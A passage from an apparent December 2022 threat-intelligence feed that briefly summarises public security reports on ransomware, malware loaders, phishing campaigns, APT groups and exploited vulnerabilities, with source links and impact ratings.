Summary:: Palo Alto Unit 42 researches expained the phishing techniques for Meddler in the Middle (MitM) phishing attacks. Meddler in the Middle (MitM) phishing attacks show how threat actors find ways to get around traditional defenses and advice. MitM phishing attacks are a state-of-the-art type of phishing attack capable of breaking two-factor authentication (2FA) while avoiding many content-based phishing detection engines. Rather than showing a spoofed version of a target login page, a MitM attack uses a reverse-proxy server to relay the original login page directly to the user’s browser.

Source: https://unit42.paloaltonetworks.com/meddler-phishing-attacks/

Intel Source:: TrendMicro

Intel Name:: Windows_AMSI_Bypass_Techniques

Date of Scan:: 2022-12-22

Impact:: MEDIUM

Summary:: TrendMicro researchers have analyzed the implementations that cybercriminals use to bypass the Windows Antimalware Scan Interface (AMSI).

Source: https://www.trendmicro.com/en_us/research/22/l/detecting-windows-amsi-bypass-techniques.html

Intel Source:: Sucuri

Intel Name:: FakejQuery_Domain_Redirects_Site_Visitors_to_Scam_Pages

Date of Scan:: 2022-12-22

Impact:: LOW

Summary:: Sucuri researchers have identified an infection that makes its round across vulnerable WordPress sites, detected on over 160 websites. The infection is injected at the top of legitimate JavaScript files and executes a script from the malicious domain.

Source: https://blog.sucuri.net/2022/12/fake-jquery-domain-redirects-site-visitors-scam.html

Intel Source:: Rewterz

Intel Name:: Hive_Ransomware_Active_IOCs

Date of Scan:: 2022-12-22

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Hive Ransomware. It is one of the quickest evolving ransomware families which was first observed in June 2021 and likely operates as affiliate-based ransomware, employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-hive-ransomware-active-iocs-28

Intel Source:: Rewterz

Intel Name:: North_Korean_APT_Kimsuky_Aka_Black_Banshee_Active_IOCs

Date of Scan:: 2022-12-22

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of North Korean APT Kimsuky Aka Black Banshee. It is a North Korean nation-state actor that has been active since 2012. It primarily targets South Korean government agencies and conducts espionage activities against targets in the United States and Japan.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-north-korean-apt-kimsuky-aka-black-banshee-active-iocs-2

Intel Source:: Cyble

Intel Name:: Spotted_multiple_ransomware_strains

Date of Scan:: 2022-12-22

Impact:: MEDIUM

Summary:: Cyble Research and Intelligence Labs (CRIL) have spotted multiple ransomware strains created based on the source of other ransomware families. Recently, CRIL observed new ransomware families, such as Putin Team, ScareCrow, BlueSky Meow, etc., created from the leaked source code of Conti Ransomware.

Source: https://blog.cyble.com/2022/12/22/new-ransomware-strains-emerging-from-leaked-contis-source-code/

Intel Source:: Cisco Talos

Intel Name:: Hackers_Using_Microsoft_Excel_Malicious_Addins

Date of Scan:: 2022-12-22

Impact:: LOW

Summary:: Researchers from Cisco Talos have investigated another vector for the introduction of malicious code to Microsoft Excel malicious add-ins, specifically XLL files.

Source: https://blog.talosintelligence.com/xlling-in-excel-malicious-add-ins/

Intel Source:: Zscaler

Intel Name:: Diving_Deep_into_Nokoyawa_Ransomware

Date of Scan:: 2022-12-22

Impact:: LOW

Summary:: Researchers from Zscaler have analyzed the Nokoyawa ransomware 2.0 including its new configuration, encryption algorithms, and data leak site.

Source: https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust

Intel Source:: TrendMicro

Intel Name:: The_Examine_of_Royal_Ransomware_and_Tools_Using_by_Threat_Actors

Date of Scan:: 2022-12-22

Impact:: LOW

Summary:: Researchers from Trendmicro have detected multiple attacks from the Royal ransomware group and they have investigated the tools that Royal ransomware actors used to carry out their attacks.

Source: https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html

Intel Source:: Rewterz

Intel Name:: Qakbot_aka_Qbot_Malware_Active_IOCs

Date of Scan:: 2022-12-22

Impact:: MEDIUM

Summary:: The Rewterz analysts team have observed last couple months that attackers are employing a number of strategies to avoid detection, using Excel (XLM) 4.0 and ZIP file extensions. hreat actors are disguising attachments intended to spread malware using a variety of different common file names with typical keywords for finance and business operations

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-qakbot-qbot-malware-active-iocs-51

Intel Source:: PaloAlto

Intel Name:: Russian_Hackers_Targeting_Petroleum_Refinery_in_NATO

Date of Scan:: 2022-12-21

Impact:: MEDIUM

Summary:: PaloAlto researchers have discovered the Russia-linked Gamaredon group attempting to unsuccessfully break into a large petroleum refining company within a NATO member state earlier this year amid the ongoing Russo-Ukrainian war. Also, seen more than 500 new domains and 200 malware samples attributed to Gamaredon APT since the beginning of the invasion.

Source: https://unit42.paloaltonetworks.com/trident-ursa/

Intel Source:: Rewterz

Intel Name:: SystemBC_Malware_active_IOCs

Date of Scan:: 2022-12-20

Impact:: MEDIUM

Summary:: The Rewterz analysts team did analyses summary on SystemBC malware is recently being distributed through Emotet and SmokeLoader. The malware has been used in multiple ransomware attacks over the past few years. SystemBC acts as a Proxy Bot and if an infected system has SystemBC on it, then the system can be used as a passage to access the victim’s address.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-systembc-malware-active-iocs-8

Intel Source:: Rewterz

Intel Name:: STOP_DJVU_Ransomware_active_IOCs

Date of Scan:: 2022-12-20

Impact:: HIGH

Summary:: The Rewterz analysts team did analysis summary on STOP (DJVU) Ransomware. The STOP/DJVU ransomware is a Trojan that encrypts files. It infiltrates your computer invisibly and encrypts all of your data, making them unavailable to you. It leaves a ransom letter warning which demands money in exchange for decrypting your data and making them available to you again. Malware is delivered via cracked applications, fake set-up apps keygens, activators, and Windows updates.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-stop-djvu-ransomware-active-iocs-50

Intel Source:: Rewterz

Intel Name:: BumbleBee_Malware_active_IOCs

Date of Scan:: 2022-12-20

Impact:: MEDIUM

Summary:: The rewterz analysts team did analyses summery on BumbleBee Malware. This malware loader is used to download Cobalt Strike and other malware such as ransomware. It can replaces the BazarLoader backdoor, which is previously used to transmit ransomware payloads. This new malware is linked to a number of threat actors, including several well-known ransomware.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-bumblebee-malware-active-iocs-14

Intel Source:: Rewterz

Intel Name:: LockBit_3_0_Ransomware_active_IOCs

Date of Scan:: 2022-12-20

Impact:: HIGH

Summary:: The Rewterz analysts team did analyses summary on LockBit 3.0 ransomware that has recently been distributed without restriction to version or identical filename. Users must examine the file extensions of document files, update apps and V3 to the newest version, and be very cautious when opening files from unidentified sources.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-lockbit-3-0-ransomware-active-iocs-4

Intel Source:: CrowdStrike

Intel Name:: GuLoader_Dissection_Malware_Analysis

Date of Scan:: 2022-12-20

Impact:: LOW

Summary:: CrowdStrike researchers expose complete GuLoader behavior by mapping all embedded DJB2 hash values for every API used by the malware

Source: https://www.crowdstrike.com/blog/guloader-dissection-reveals-new-anti-analysis-techniques-and-code-injection-redundancy/

Intel Source:: Rewterz

Intel Name:: GandCrab_Ransomware_active_IOCs

Date of Scan:: 2022-12-20

Impact:: HIGH

Summary:: The Rewterz analysts team did analyses summary on GandCrab which is a ransomware-as-a-service variant – was discovered in early 2018. As of today it had five versions of GandCrab have been created since its discovery. GandCrab ransomware encrypts victim’s files and demands ransom money in exchange for decryption keys. GandCrab targets organisations and individuals that use Microsoft Windows-powered PCs. This ransomware has attacked a huge number of systems in India, Chile, Peru, the United States, and the Philippines.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-gandcrab-ransomware-active-iocs-12

Intel Source:: FlashPoint

Intel Name:: RisePro_Stealer_Malware_Presence_on_Russian_Market

Date of Scan:: 2022-12-20

Impact:: LOW

Summary:: Researchers from Flashpoint have observed RisePro stealer malware logs on Russian market and the appearance of the stealer as a payload for a pay-per-install service, may indicate its growing popularity and viability within the threat actor community.

Source: https://flashpoint.io/blog/risepro-stealer-and-pay-per-install-malware-privateloader/

Intel Source:: Reversing Labs

Intel Name:: Posing_of_SentinelOne_SDK_as_Malicious_PyPI_package

Date of Scan:: 2022-12-20

Impact:: LOW

Summary:: Researchers from Reversing Labs have identified a new malicious package, named ‘SentinelOne,’ on the Python Package Index (PyPI) repository that impersonates a legitimate software development kit (SDK) for SentinelOne.

Source: https://blog.reversinglabs.com/blog/sentinelsneak-malicious-pypi-module-poses-as-security-sdk

Intel Source:: TrendMicro

Intel Name:: Telecom_and_Governments_are_targeted_by_Raspberry_Robin_Malware

Date of Scan:: 2022-12-20

Impact:: MEDIUM

Summary:: TrendMicro reserachers discovered some new samples of the Raspberry Robin malware spreading in telecommunications and government office systems. The main payload itself is packed with more than 10 layers for obfuscation and is capable of delivering a fake payload once it detects sandboxing and security analytics tools.

Source: https://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html

Intel Source:: Rewterz

Intel Name:: Snake_Keylogger_s_Malware_active_IOCs

Date of Scan:: 2022-12-20

Impact:: MEDIUM

Summary:: The Rewterz analysts team did analysis summary on Snake Keylogger’s Malware. Snake malware’s main feature is keylogging, but it also has additional capabilities such as taking screenshots and extracting data from the clipboard. Snake can also extract and exfiltrate data from browsers and email clients.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-snake-keyloggers-malware-active-iocs-39

Intel Source:: ISC.SANS

Intel Name:: Infostealer_Malware_with_Double_Extension

Date of Scan:: 2022-12-19

Impact:: LOW

Summary:: Researchers from SANS have analyzed the file attachment which is pretending to be from HSBC global payment and cash management and named payment_copy.pdf.z is a RAR archive. It comes out as a double extension with pdf.exe. The file is a trojan infostealer and is detected by multiple scanning engines.

Source: https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354/

Intel Source:: CERT-UA

Intel Name:: Hackers_Leveraging_DELTA_System_Users_Using_FateGrab_or_StealDeal_Malware

Date of Scan:: 2022-12-19

Impact:: LOW

Summary:: CERT-UA researchers have identified the distribution of e-mail, using a compromised e-mail address of one of the employees of the Ministry of Defense. The attachments in the form of PDF documents imitate legitimate digests of the ISTAR unit of the Zaporizhzhia Police Department but contain a link to a malicious ZIP archive.

Source: https://cert.gov.ua/article/3349703

Intel Source:: Nozomi Networks

Intel Name:: Malicious_Glupteba_Activity

Date of Scan:: 2022-12-19

Impact:: MEDIUM

Summary:: Nozomi Networks Lab shared their latest dicoveries on the Glupteba trojan which is an example of a threat actor leveraging blockchain-based technologies to carry out their malicious activity.

Source: https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/

Intel Source:: TrendMicro

Intel Name:: Agenda_Ransomware_Using_Rust_language

Date of Scan:: 2022-12-16

Impact:: LOW

Summary:: Researchers from Trendmicro have analyzed a sample of the Agenda ransomware written in Rust language and detected it as Ransom.Win32.AGENDA.THIAFBB. It is recently targeting critical sectors such as the healthcare and education industries.

Source: https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html

Intel Source:: Fortinet

Intel Name:: New_Malicious_Python_Package_Shaderz_Distributing_via_Supply_Chain_Attack

Date of Scan:: 2022-12-16

Impact:: LOW

Summary:: Researchers from Fortinet have analyzed Shaderz zero-day and closely monitored its downloaded executables.

Source: https://www.fortinet.com/blog/threat-research/supply-chain-attack-via-new-malicious-python-package-shaderz-part-2

Intel Source:: Cyfirma

Intel Name:: Russian_Threat_Groups_Launching_Multiple_Campaigns

Date of Scan:: 2022-12-16

Impact:: LOW

Summary:: Cyfirma researchers have observed three campaigns named Evian, UNC064, and Siberian bear that are potentially operated by Russian-speaking threat groups on behalf of their Russian Masters.

Source: https://www.cyfirma.com/outofband/multiple-campaigns-by-russian-speaking-threat-groups-expanding-their-attack-footprint/

Intel Source:: Cyble

Intel Name:: CSC_Bank_Mitra_fraudulent_operation

Date of Scan:: 2022-12-16

Impact:: LOW

Summary:: Cyble Research & Intelligence Labs studied a fraud scheme operation done by impostors posing as Village Level Entrepreneurs (VLEs) to dupe and scam Indian rural subscribers registering for Customer Service Point (Bank Mitra), an initiative under the Common Services Center (CSC) Scheme of the Ministry of Electronics and Information Technology (MEITY), India.

Source: https://blog.cyble.com/2022/12/16/con-games-fraudsters-posing-as-vles-duping-csc-bank-mitra-scheme-subscribers/

Intel Source:: Mandiant

Intel Name:: Ukrainian_Government_Networks_Breached_via_Trojanized_Windows_10_Installers

Date of Scan:: 2022-12-16

Impact:: LOW

Summary:: Researchers from Mandiant have observed that Ukrainian government entities are hacked in targeted attacks after their networks are first compromised via trojanized ISO files posing as legitimate Windows 10 installers.

Source: https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

Intel Source:: Cyble

Intel Name:: DarkTortilla_Malware_Spreading_Via_Phishing_Sites

Date of Scan:: 2022-12-16

Impact:: LOW

Summary:: Cyble researchers have identified a malicious campaign where they observed hackers dropping DarkTortilla malware. It is a complex .NET-based malware that has been active since 2015 and the malware is known to drop multiple stealers and Remote Access Trojans (RATs) such as AgentTesla, AsyncRAT, NanoCore, etc.

Source: https://blog.cyble.com/2022/12/16/sophisticated-darktortilla-malware-spreading-via-phishing-sites/

Intel Source:: Microsoft

Intel Name:: MCCrash_Botnet_Targeting_Private_Minecraft_Servers

Date of Scan:: 2022-12-16

Impact:: MEDIUM

Summary:: Microsoft researchers have identified a cross-platform botnet named MCCrash that's primarily designed to launch distributed denial-of-service (DDoS) attacks against private Minecraft servers. It is characterized by a unique spreading mechanism that allows it to propagate to Linux-based devices despite originating from malicious software downloads on Windows hosts.

Source: https://www.microsoft.com/en-us/security/blog/2022/12/15/mccrash-cross-platform-ddos-botnet-targets-private-minecraft-servers/

Intel Source:: ASEC

Intel Name:: Magniber_Ransomware_distribution_again

Date of Scan:: 2022-12-15

Impact:: LOW

Summary:: The ASEC analysis team has discovered that Magniber Ransomware is being distributed again with COVID-19 related filenames, while the threat actor has changed the infection vector and is using social engineering techniques.

Source: https://asec.ahnlab.com/en/44315/

Intel Source:: ESET Research

Intel Name:: Spearphishing_Campaign_Targeting_Japanese_Political_Entities

Date of Scan:: 2022-12-15

Impact:: LOW

Summary:: Researchers from ESET have discovered a spearphishing campaign targeting Japanese political entities a few weeks before the House of Councillors elections, and in the process uncovered a previously undescribed MirrorFace credential stealer.

Source: https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/

Intel Source:: ASEC

Intel Name:: STOP_Ransomware_Distributing_in_Korea

Date of Scan:: 2022-12-15

Impact:: LOW

Summary:: ASEC researchers have discovered that the STOP ransomware is distributed in Korea and the files that are currently distributed are in the form of MalPe just like SmokeLoader and Vidar, and the filenames include a random 4-byte string.

Source: https://asec.ahnlab.com/en/43861/

Intel Source:: ISC.SANS

Intel Name:: Hackers_Leveraging_Google_Ads_to_Distribute_IcedID

Date of Scan:: 2022-12-15

Impact:: LOW

Summary:: Researchers from SANS have identified that campaigns pushing IcedID malware (also known as Bokbot) via google ads.

Source: https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344/

Intel Source:: Proofpoint

Intel Name:: Iran_linked_cyberspies_expand_targeting_to_medical_researchers_and_travel_agencies

Date of Scan:: 2022-12-15

Impact:: LOW

Summary:: Researchers from Proofpoint have analyzed the threat group TA453 and observed outlier campaigns are likely to continue and reflect IRGC intelligence collection requirements, including possible support for hostile, and even kinetic, operations.

Source: https://www.proofpoint.com/us/blog/threat-insight/ta453-refuses-be-bound-expectations

Intel Source:: Checkmarx Security

Intel Name:: Hackers_Blast_Open_Source_Repositories_with_Over_144000_Malicious_Packages

Date of Scan:: 2022-12-15

Impact:: LOW

Summary:: Checkmarx researchers have identified that unknown threat actors have uploaded a massive 144,294 phishing-related packages on open-source package repositories, inluding NPM, PyPi, and NuGet.

Source: https://checkmarx.com/blog/how-140k-nuget-npm-and-pypi-packages-were-used-to-spread-phishing-links/

Intel Source:: Fortinet

Intel Name:: GoTrim_Botnet_Brute_Forces_WordPress_Site_Admin_Accounts

Date of Scan:: 2022-12-14

Impact:: LOW

Summary:: Researchers from Fortinet have observed a new Go-based botnet malware named 'GoTrim' is scanning the web for self-hosted WordPress websites and attempting to brute force the administrator's password and take control of the site.

Source: https://www.fortinet.com/blog/threat-research/gotrim-go-based-botnet-actively-brute-forces-wordpress-websites

Intel Source:: Mandient, Sentilone

Intel Name:: Targeted_Attacks_Leverage_Signed_Malicious_Microsoft_Drivers

Date of Scan:: 2022-12-14

Impact:: LOW

Summary:: SentinelOne discovered active threat actors abusing legitimately signed Microsoft drivers in active intrusions into telecommunication, BPO, MSSP, and financial services businesses. Investigations into these intrusions led to the discovery of POORTRY and STONESTOP malware, part of a small toolkit designed to terminate AV and EDR processes.

Source: https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware https://www.sentinelone.com/labs/driving-through-defenses-targeted-attacks-leverage-signed-malicious-microsoft-drivers/

Intel Source:: Phylum

Intel Name:: Malware_Strains_Targeting_Python_and_JavaScript_Developers

Date of Scan:: 2022-12-14

Impact:: LOW

Summary:: Phylum researchers have identified an active malware campaign targeting the Python Package Index (PyPI) and npm repositories for Python and JavaScript with typosquatting and fake modules that deploy a ransomware strain, marking the latest security issue to affect software supply chains.

Source: https://blog.phylum.io/phylum-detects-active-typosquatting-campaign-in-pypi

Intel Source:: TrendMicro

Intel Name:: Hackers_Leveraging_LiveHelp100_For_Supply_Chain_Attacks

Date of Scan:: 2022-12-14

Impact:: LOW

Summary:: Researchers from Trendmicro have analyzed the infection chain and the pieces of malware used by malicious actors in supply-chain attacks that leveraged trojanized installers of chat-based customer engagement platforms.

Source: https://www.trendmicro.com/en_us/research/22/l/probing-weaponized-chat-applications-abused-in-supply-chain-atta.html

Intel Source:: Cyble

Intel Name:: Expendtion_of_Venom_RAT_operations

Date of Scan:: 2022-12-14

Impact:: LOW

Summary:: CRIL has uncovered a new version of the Venom RAT (Remote Access Trojan), which can steal sensitive data from a victim’s computer. Venom RAT is an effective malware that works stealthily, giving attackers unauthorized access to the victim’s machine. Threat Actors can then use the victim’s computer to perform various malicious activities such as installing and removing additional malware, manipulating files, reading data from the keyboard, harvesting login credentials, monitoring the clipboard.

Source: https://blog.cyble.com/2022/12/13/venom-rat-expands-its-operations-by-adding-a-stealer-module/

Intel Source:: Secureworks

Intel Name:: COALT_MIRAGE_Hackers_Leveraging_Drokbk_Malware

Date of Scan:: 2022-12-14

Impact:: LOW

Summary:: Researchers from Secureworks have investigated the Drokbk malware, which is operated by a subgroup of the Iranian government-sponsored COBALT MIRAGE threat group. This subgroup is known as Cluster B. Drokbk is written in .NET and is made up of a dropper and a payload.

Source: https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver

Intel Source:: Checkpoint

Intel Name:: Cloud_Atlas_Targeting_Entities_in_Russia_and_Belarus

Date of Scan:: 2022-12-14

Impact:: LOW

Summary:: Checkpoint researchers have identified Cloud Atlas continuously and persistently targeting entities of interest. With the escalation of the conflict between Russia and Ukraine, their focus for the past year has been on Russia and Belarus and their diplomatic, government, energy, and technology sectors, and on the annexed regions of Ukraine.

Source: https://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/

Intel Source:: Wordfence

Intel Name:: Vulnerabilities_Found_in_Adning_and_Kaswara_Plugin

Date of Scan:: 2022-12-14

Impact:: MEDIUM

Summary:: Researchers from Wordfence have observed that spikes in attacks serve as a reminder to update plugins.

Source: https://www.wordfence.com/blog/2022/12/spikes-in-attacks-serve-as-a-reminder-to-update-plugins/

Intel Source:: Weixin

Intel Name:: The_new_Go_language_botnet_RedGoBot

Date of Scan:: 2022-12-14

Impact:: LOW

Summary:: Last month QiAnXin Threat Intelligence Center had an incident where a malicious sample from an unknown family exploited the Vacron NVR RCE vulnerability to spread. They did the detailed analysis, this series of samples does not belong to known malicious families. The malicious sample will print the string "GoBot" when it runs, and refer to the author's output "@redbot on top" on his property website, we named it RedGoBot.

Source: https://mp.weixin.qq.com/s/4iTA4LBNEnOQ5T5AcvZCCA

Intel Source:: SentinelOne, Mandiant and Sophos

Intel Name:: MS_Signed_Malicious_Drivers_Used_in_Ransomware_Attacks

Date of Scan:: 2022-12-14

Impact:: MEDIUM

Summary:: Microsoft revoked several hardware developer accounts after drivers signed through their profiles were used in cyberattacks, including ransomware incidents. Multiple researchers explain that threat actors are utilizing malicious kernel-mode hardware drivers whose trust is verified with Authenticode signatures from Microsoft's Windows Hardware Developer Program.

Source: https://www.sentinelone.com/labs/driving-through-defenses-targeted-attacks-leverage-signed-malicious-microsoft-drivers/ https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware https://news.sophos.com/en-us/2022/12/13/signed-driver-malware-moves-up-the-software-trust-chain/

Intel Source:: Cyber

Intel Name:: Analysis_of_Royal_Ransomware

Date of Scan:: 2022-12-14

Impact:: MEDIUM

Summary:: The Royal ransomware group emerged in early 2022 and has gained momentum since the middle of the year. Its ransomware, which the group deploys through different TTPs, has impacted multiple organizations across the globe. The group itself is suspected of consisting of former members of other ransomware groups, based on similarities researchers have observed between Royal ransomware and other ransomware operators.

Source: https://www.cybereason.com/blog/royal-ransomware-analysis

Intel Source:: Cyble

Intel Name:: Thre_increased_Activity_of_Mallox_Ransomware

Date of Scan:: 2022-12-14

Impact:: LOW

Summary:: Cyble Research and Intelligence Labs (CRIL) recently observed a spike in Mallox ransomware samples. The researchers named it TargetCompany ransomware because it adds the targeted company name as a file extension to the encrypted files. In September 2022, researchers identified a TargetCompany ransomware variant targeting Microsoft SQL servers and adding the “Fargo” extension to the encrypted files. TargetCompany ransomware is also known to add a “Mallox” extension after encrypting the files.

Source: https://blog.cyble.com/2022/12/08/mallox-ransomware-showing-signs-of-increased-activity/

Intel Source:: Juniper Network

Intel Name:: New_Python_Backdoor_Targeting_VMware_ESXi_Servers

Date of Scan:: 2022-12-13

Impact:: LOW

Summary:: Juniper Network researchers have identified a previously undocumented Python backdoor targeting VMware ESXi servers has been spotted, enabling hackers to execute commands remotely on a compromised system.

Source: https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers

Intel Source:: ASEC

Intel Name:: Microsoft_Account_Stealing_Phishing_Page

Date of Scan:: 2022-12-13

Impact:: LOW

Summary:: Researchers from ASEC have identified a large portion of phishing emails with the purpose of stealing login credentials to target Microsoft accounts.

Source: https://asec.ahnlab.com/en/43821/

Intel Source:: Cymru

Intel Name:: Continuation_of_Iranian_Exploitation_Activities

Date of Scan:: 2022-12-13

Impact:: MEDIUM

Summary:: Cymru shared an update on ongoing tracking of PHOSPHORUS threat actor group associated with Iran. PHOSPHORUS is an Iranian threat group known to target organizations in energy, government, and technology sectors based in Europe, the Middle East, the United States, and other countries/regions.

Source: https://www.team-cymru.com/post/iranian-exploitation-activities-continue-as-of-november-2022

Intel Source:: Ptsecurity

Intel Name:: The_Cloud_Atlas_group_activity

Date of Scan:: 2022-12-13

Impact:: LOW

Summary:: Ptsecurity discussed the main techniques of the Cloud Atlas group, and took an in-depth look at the tools they use and posted the detailed analysis and description of the functionality of these tools.

Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt-cloud-atlas-unbroken-threat/

Intel Source:: Trustwave

Intel Name:: Formbook_malware_deployed_using_OneNote_Documents

Date of Scan:: 2022-12-13

Impact:: LOW

Summary:: Trustwave uncovered threat actors using a OneNote document to move Formbook malware, an information stealing trojan sold on an underground hacking forum since mid-2016 as malware-as-a-service.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/

Intel Source:: Checkpoint

Intel Name:: Analysis_of_the_infamous_Azov_Ransomware

Date of Scan:: 2022-12-13

Impact:: LOW

Summary:: Chepoint have shared report goes with more details regarding the internal workings of Azov ransomware and its technical features.

Source: https://research.checkpoint.com/2022/pulling-the-curtains-on-azov-ransomware-not-a-skidsware-but-polymorphic-wiper/

Intel Source:: Fortiguard

Intel Name:: FortiOS_SSL_VPN_bug

Date of Scan:: 2022-12-13

Impact:: MEDIUM

Summary:: Fortinet urges customers to update their installs to address an actively exploited FortiOS SSL-VPN vulnerability, tracked as CVE-2022-42475, that could be exploited by an unauthenticated, remote attacker to execute arbitrary code on devices.

Source: https://www.fortiguard.com/psirt/FG-IR-22-398

Intel Source:: Deep Instinct

Intel Name:: MuddyWater_APT_group_is_back_with_updated_TTPs

Date of Scan:: 2022-12-12

Impact:: LOW

Summary:: Researchers from Deep Instinct have identified a new campaign conducted by the MuddyWater APT (aka SeedWorm, TEMP.Zagros, and Static Kitten) that was targeting Armenia, Azerbaijan, Egypt, Iraq, Israel, Jordan, Oman, Qatar, Tajikistan, and United Arab Emirates.

Source: https://www.deepinstinct.com/blog/new-muddywater-threat-old-kitten-new-tricks

Intel Source:: TrendMicro

Intel Name:: Linux_Cryptocurrency_Mining_Attacks_Increasing_via_CHAOS_RAT

Date of Scan:: 2022-12-12

Impact:: LOW

Summary:: Researchers from Trendmicro have observed a cryptocurrency mining attack that incorporated an advanced remote access trojan (RAT) named the CHAOS Remote Administrative Tool.

Source: https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html

Intel Source:: Jscrambler

Intel Name:: A_new_batch_of_Web_Skimming_attacks

Date of Scan:: 2022-12-12

Impact:: LOW

Summary:: Jscrambler analysts observed a new modus operandi evident in three threat groups. The analysts shared their analyses about their findings in detail about it.

Source: https://blog.jscrambler.com/defcon-skimming-a-new-batch-of-web-skimming-attacks/

Intel Source:: Sucuri

Intel Name:: World_Cup_Keywords_targeted_by_Chinese_Gambling_Spam

Date of Scan:: 2022-12-12

Impact:: LOW

Summary:: Many of the compromised websites have been recently updated to include modified titles for keywords related to the Qatar 2022 FIFA World Cup. Recently the researchers team has observed a pivot for the campaign to leverage search traffic for the popular World Cup soccer championship.

Source: https://blog.sucuri.net/2022/12/chinese-gambling-spam-targets-world-cup-keywords.html

Intel Source:: Esentire

Intel Name:: The_Redline_Stealer_distribution_via_fake_software_AnyDesk

Date of Scan:: 2022-12-10

Impact:: MEDIUM

Summary:: ESentire SOC Cyber Analysts did deeper malware analysis into the technical details of how the Redline Stealer malware operates and concluded that Redline Stealer is mostly being distributed via fake software. Attacker(s) also use YouTube and/or other third-party advertising platforms to spread the stealer. Attacker(s) use an AutoIt wrapper and various crypting services to obfuscate the stealer binary. Redline comes with loader tasks that allow an attacker to perform various actions on the infected host including file download, process injection and command execution.

Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-redline-stealer

Intel Source:: Cyble

Intel Name:: The_various_scams_exploiting_the_popularity_of_the_FIFA_World_Cup

Date of Scan:: 2022-12-10

Impact:: LOW

Summary:: While monitoring phishing activity, Cyble Research & Intelligence Labs identified a few crypto phishing schemes involving the use of the FIFA World Cup theme to lure the victims. The phishing site “football-blnance[.]com” was pretending to be the Binance cryptocurrency website attempting to trick users into giving sensitive information by offering free Non-Fungible Tokens (NFTs).

Source: https://blog.cyble.com/2022/12/09/threat-actors-targeting-fans-amid-fifa-world-cup-fever/

Intel Source:: Esentire

Intel Name:: New_Infection_Technique_of_GootLoader_malware

Date of Scan:: 2022-12-09

Impact:: MEDIUM

Summary:: On December 2, 2022, one of ESentire SOC Cyber Analysts raised their incident involving the GootLoader malware at a pharmaceutical company. eSentire’s Threat Response Unit proceeded with an in-depth threat investigation of GootLoader.

Source: https://www.esentire.com/blog/gootloader-striking-with-a-new-infection-technique

Intel Source:: CERT-UA

Intel Name:: kamikaze_drones_and_DolphinCape_malware

Date of Scan:: 2022-12-09

Impact:: MEDIUM

Summary:: Government Computer Emergency Response Team of Ukraine CERT-UA received information from specialists of the cyber security division of JSC "Ukrzaliznytsia" regarding the sending of e-mails with the topic "How to recognize a kamikaze drone." from the address "morgunov.a@dsns.com[.]ua", apparently, on behalf of the State Emergency Service of Ukraine.

Source: https://cert.gov.ua/article/3192088

Intel Source:: Google

Intel Name:: Internet_Explorer_0day_exploited_by_North_Korean_actor_APT37

Date of Scan:: 2022-12-09

Impact:: LOW

Summary:: Google’s Threat Analysis Group (TAG) routinely hunts for 0-day vulnerabilities exploited in-the-wild. This blog will describe a 0-day vulnerability, discovered by TAG in late October 2022, embedded in malicious documents and used to target users in South Korea.

Source: https://blog.google/threat-analysis-group/internet-explorer-0-day-exploited-by-north-korean-actor-apt37/

Intel Source:: Recorded Future

Intel Name:: The_identified_TAG53_infrastructure_features_common_traits

Date of Scan:: 2022-12-09

Impact:: LOW

Summary:: Recorded Future's Insikt Group has identified new infrastructure used by TAG-53, a group likely linked to suspected Russian threat activity groups Callisto Group, COLDRIVER, and SEABORGIUM.

Source: https://www.recordedfuture.com/exposing-tag-53-credential-harvesting-infrastructure-for-russia-aligned-espionage-operations

Intel Source:: PaloAlto

Intel Name:: Cloud_compute_credentials_attack_examples

Date of Scan:: 2022-12-09

Impact:: LOW

Summary:: Unit 42 PaloAlto shared in their blog two examples of cloud compute credentials attacks in the wild. They de3scribed in it the post-breach actions executed during the attack, and share the flow of these two attacks against the cloud infrastructure. The attack flows show how threat actors abuse stolen compute credentials to pursue a variety of attack vectors and abuse cloud services in unexpected ways. This emphasizes how important it is to follow Amazon Web Services and Google Cloud logging and monitoring best practices.

Source: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/

Intel Source:: Cisco Talos

Intel Name:: Breaking_the_silence_Truebot_activity

Date of Scan:: 2022-12-09

Impact:: MEDIUM

Summary:: Cisco Talos researchers that one of the new follow-on payloads that Truebot drops is Grace (aka FlawedGrace and GraceWire) malware, which is attributed to TA505, further supporting these claims.

Source: https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

Intel Source:: ASEC

Intel Name:: Phishing_Email_Impersonating_Quasi_governmental_Organization_Being_Distributed

